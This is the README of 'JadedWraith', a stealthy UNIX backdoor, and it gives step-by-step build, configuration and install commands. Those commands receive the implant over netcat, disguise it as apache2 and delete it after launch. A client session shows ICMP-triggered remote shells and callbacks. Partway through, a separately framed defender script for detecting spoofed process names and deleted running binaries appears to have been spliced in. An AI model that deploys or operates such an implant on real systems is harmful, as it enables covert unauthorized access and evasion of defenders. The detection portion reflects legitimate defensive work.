Light-weight UNIX backdoor

Overview

JadedWraith

Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago as part of a game I was playing with a friend, trying to backdoor as many VMs in each other's labs as possible without being caught or having our tools reverse engineered or signatured.

Features

JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a "magic" ICMP packet instructing it to either call back or listen. This is partly inspired by tools such as PRISM; however, unlike PRISM, JadedWraith incorporates shoddy cryptography to obfuscate command and control. JadedWraith can be used to execute remote commands or upload follow-on payloads.

JadedWraith can be compiled as a standalone executable or as a shared object for process injection.

Components

The source code for the actual implant can be found inside the src directory. The client directory contains a simple Python-based client for interacting with JadedWraith. The conf_jawr script is used to configure new JadedWraith executables.

Dependencies

The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap may also be required, in which case you must run the ./configure script with --use-libpcap to enable libpcap support.

The Python configuration script and client require the following packages: termcolor, pycryptodomex

How to compile

Simply use the Makefile to compile. Note: The resulting binaries found in bin must be configured before they can be used.

$ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf

How to configure

Use the conf_jawr script to configure JadedWraith executables. It will search the bin directory for JadedWraith executables to configure. The configured binary will be written to the configured directory.

$ ./conf_jawr
JadedWraith Configuration

Please choose a JadedWraith binary to use: 
    1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] : 
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] : 
argv[0] (Leave blank to not spoof command) [] : 

JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin

Try me!
   sudo ./wraith-client.py <IP_ADDRESS> -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell

How to install

A configured implant can simply be run on the target system. If configured to use the passive ICMP functionality, it must be run as root. The environment variable _CMD can be used to spoof the process's argv[].

# cd /tmp
# nc -lvp 4444 > apache2
# chmod +x apache2
# _CMD="/usr/sbin/apache2" ./apache2
# rm apache2
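A defender-side check for the two traces the install procedure above leaves on a Linux host: a spoofed argv[0] that does not match the executable behind /proc/<pid>/exe, and a binary unlinked while its process is still running (the kernel appends "(deleted)" to the exe link). This is an added example, not JadedWraith's own code; the resolve() hook is my assumption so the comparison logic can be exercised on constructed input.

```python
"""Hunt for argv[0] spoofing and run-then-delete executables via /proc (Linux)."""
import os
import shutil

DELETED = " (deleted)"   # suffix the kernel appends to /proc/<pid>/exe after unlink

def default_resolve(argv0):
    """Map an argv[0] string to the on-disk file it would actually start:
    bare names are looked up in PATH and symlinks are followed, so a
    legitimate 'sh' -> /usr/bin/dash compares equal to its exe link."""
    path = argv0 if "/" in argv0 else shutil.which(argv0)
    return os.path.realpath(path) if path else None

def check_process(pid, argv0, exe_link, resolve=default_resolve):
    """Return (pid, reason, argv0, exe) findings for a single process.
    argv0: first NUL-separated field of /proc/<pid>/cmdline.
    exe_link: readlink target of /proc/<pid>/exe (already a resolved path)."""
    findings = []
    exe = exe_link
    if exe.endswith(DELETED):
        exe = exe[: -len(DELETED)]
        findings.append((pid, "executable deleted while running", argv0, exe))
    claimed = resolve(argv0) if argv0 else None
    if claimed is None:
        findings.append((pid, "argv[0] does not resolve to any file", argv0, exe))
    elif claimed != exe:
        findings.append((pid, "argv[0] does not match executable", argv0, exe))
    return findings

def scan_proc(proc="/proc", resolve=default_resolve):
    """Apply check_process to every process whose /proc entry we may read
    (run as root to cover processes of other users)."""
    findings = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
            exe_link = os.readlink(f"{proc}/{entry}/exe")
        except OSError:  # kernel thread, process already gone, or permission denied
            continue
        findings.extend(check_process(int(entry), argv0, exe_link, resolve))
    return findings

if __name__ == "__main__":
    for pid, reason, argv0, exe in scan_proc():
        print(f"pid {pid}: {reason}: argv0={argv0!r} exe={exe!r}")
```

Expect some noise from multi-call binaries such as busybox, and note that the shared-object build injected into a legitimate process leaves neither trace, so this only covers the standalone executable.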

How to interact

The wraith-client.py script inside client can be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawr script, substituting the target's IP for <IP_ADDRESS>. If utilizing the ICMP functionality, the script must be run as root to send the ICMP packet.

$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[*] backdoor will listen on port 58290
[*] connecting to 192.168.100.224:58290
[+] connection established!
[*] entering interactive shell
>> .cd /tmp 
>> w
 14:22:49 up  3:02,  1 user,  load average: 0.18, 0.19, 0.23
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
>> ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 11:20 ?        00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
>> .exit
$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 127.0.0.1
[*] backdoor will connect to port 37943
[*] listening on port 37943
[+] accepted connection!
[*] entering interactive shell
>> 

Bugs

I'm sure this has plenty of bugs. Let me know if you find any. I wrote this over a few days and the code isn't my proudest. Feel free to report any issues and I'll try to fix them.
